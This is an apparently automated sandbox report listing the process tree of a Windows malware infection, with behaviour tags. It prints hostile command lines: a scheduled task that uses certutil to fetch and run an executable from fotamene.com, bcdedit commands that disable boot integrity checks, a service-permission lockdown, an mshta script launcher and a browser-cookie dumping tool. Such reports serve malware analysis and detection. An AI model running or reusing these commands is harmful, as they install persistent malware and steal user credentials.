C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeC:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=741aae15-508a-49fe-a721-ec317ec1f829&browser=chrome6⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5206e00,0x7fef5206e10,0x7fef5206e207⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9272.exeC:\Users\Admin\AppData\Local\Temp\9272.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-11LAL.tmp\9272.tmp"C:\Users\Admin\AppData\Local\Temp\is-11LAL.tmp\9272.tmp" /SL5="$4027A,300262,216576,C:\Users\Admin\AppData\Local\Temp\9272.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\is-7JFSA.tmp\ST.exe"C:\Users\Admin\AppData\Local\Temp\is-7JFSA.tmp\ST.exe" /S /UID=lab2123⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender\ECROJMLXYU\prolab.exe"C:\Program Files\Windows Defender\ECROJMLXYU\prolab.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GA3VD.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-GA3VD.tmp\prolab.tmp" /SL5="$102A8,575243,216576,C:\Program Files\Windows Defender\ECROJMLXYU\prolab.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Users\Admin\AppData\Local\Temp\c0-c2c80-350-c1f84-f29c502306053\Tuhaeshapugu.exe"C:\Users\Admin\AppData\Local\Temp\c0-c2c80-350-c1f84-f29c502306053\Tuhaeshapugu.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d2hylrpz.b3a\joggaplayer.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\d2hylrpz.b3a\joggaplayer.exeC:\Users\Admin\AppData\Local\Temp\d2hylrpz.b3a\joggaplayer.exe6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4c4tnzx2.2o1\proxybot.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\4c4tnzx2.2o1\proxybot.exeC:\Users\Admin\AppData\Local\Temp\4c4tnzx2.2o1\proxybot.exe6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"7⤵
-
C:\Windows\regedit.exeregedit /s chrome.reg8⤵
- Runs .reg file with regedit
-
-
C:\Windows\system32\TASKKILL.exeTASKKILL /F /IM chrome.exe8⤵
- Kills process with taskkill
-
-
C:\Windows\system32\cmd.execmd /c chrome64.bat8⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)9⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef5206e00,0x7fef5206e10,0x7fef5206e2012⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1068 /prefetch:212⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1508 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1932 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2340 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2704 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3088 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3048 /prefetch:212⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:812⤵
- Executes dropped EXE
- Checks processor information in registry
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings12⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f4f7740,0x13f4f7750,0x13f4f776013⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3740 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3112 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3124 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3156 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3140 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3108 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4268 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3120 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1040 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1140 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1668 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1656 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=920 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2472 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4272 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2340 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:112⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3972 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3776 /prefetch:812⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1056,9297229508906040864,15467552924717767901,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4308 /prefetch:812⤵
-
-
